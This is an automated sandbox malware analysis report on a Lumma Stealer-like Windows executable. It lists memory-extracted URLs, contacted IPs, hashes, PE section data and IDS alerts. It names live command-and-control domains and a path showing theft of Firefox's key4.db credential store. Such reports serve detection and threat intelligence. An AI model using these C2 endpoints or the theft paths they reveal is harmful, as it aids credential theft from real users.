https://steamcommunity.com/profiles/76561199724331900/inventory/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:	6GNqkkKY0j.exe, 00000000.00000003.3042472090.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3019711227.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075523758.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3024468196.0000000001452000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081527231.0000000001452000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK	6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/ee	6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/discussions/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	6GNqkkKY0j.exe, 00000000.00000003.3005002977.0000000005DD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/9	6GNqkkKY0j.exe, 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/4	6GNqkkKY0j.exe, 00000000.00000003.2181401742.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://lev-tolstoi.com/api4&	6GNqkkKY0j.exe, 00000000.00000003.3075064425.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075375880.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3080379491.00000000013E7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/A	6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com:443/api	6GNqkkKY0j.exe, 00000000.00000003.2397441650.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397503538.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013DF000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001454000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/account/cookiepreferences/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/mobile	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States		20940	AKAMAI-ASN1EU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580874
Start date and time:	2024-12-26 12:44:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6GNqkkKY0j.exe renamed because original name is a hash value
Original Sample Name:	1778a174a471fdec99c35907f2267d30.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@11/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 6GNqkkKY0j.exe, PID 3500 because there are no executed function
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:45:06	API Interceptor	1878971x Sleep call for process: 6GNqkkKY0j.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse
	9pyUjy2elE.exe	Get hash	malicious	LummaC	Browse
	NQbg5Ht2hW.exe	Get hash	malicious	LummaC	Browse
23.55.153.106	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse
	BootStrapper.exe	Get hash	malicious	LummaC	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse
	Script.exe	Get hash	malicious	LummaC	Browse
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse
	HK8IIasL9i.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	172.67.157.254
	LNn56KMkEE.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.66.86
	mgEXk8ip26.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.157.254
steamcommunity.com	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	oiF7u78bY2.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.121.10.34
	2ZsJ2iP8Q2.exe	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	Script.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	23.44.201.30
	armv7l.elf	Get hash	malicious	Mirai	Browse	2.18.19.83
	armv5l.elf	Get hash	malicious	Mirai	Browse	23.62.62.162
	PodcastsTries.exe	Get hash	malicious	Vidar	Browse	23.209.72.39
	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	184.85.182.130
CLOUDFLARENETUS	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.157.254 23.55.153.106
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 23.55.153.106

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.554424798300179
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6GNqkkKY0j.exe
File size:	2'894'848 bytes
MD5:	1778a174a471fdec99c35907f2267d30
SHA1:	4867feba972b8cab9eb49ce4421b88193bff2d0b
SHA256:	eb58db1db82012e283903925b9f45c73ff3427ef522c853bc286ed9e395924a9
SHA512:	a8ccb13ea18d12643d59507f98ea4947d92f9eb5faafca305ff9e01b371bf441821a297fc481a53f0ccb9eb541ec71d15663c9d76cdcd6397f6f68a877a0e60d
SSDEEP:	49152:sL+QJqanJUzeI7HK2yo619gKlXpohDddYxnOt16caym:w9g2JUzeI7HK2yo619HWldGxnOt16caV
TLSH:	7CD54A61F90972CFD88E97B49927CD835A6C43B9472804E3E95868FB7D63CC116B7C28
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..........................................@.......................... /......B,...@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x6ef000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0FE0D23E2Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	1025838d346ec9bdb57d8ea37193b242	False	0.9994510825163399	data	7.980471642795688	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ubzvudki	0x55000	0x299000	0x299000	c5cd7cb596b1f92a3f15fffc23a3ca0f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
webyiwwz	0x2ee000	0x1000	0x400	c793e6b7c44e1f56f17e4dd65fc49719	False	0.7734375	data	6.028501120723357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2ef000	0x3000	0x2200	ed3a360cc77928189cb5dbd7843d8be3	False	0.09800091911764706	DOS executable (COM)	1.2159092109839251	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:45:07.607341+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.5	60595	1.1.1.1	53	UDP
2024-12-26T12:45:07.748559+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.5	52446	1.1.1.1	53	UDP
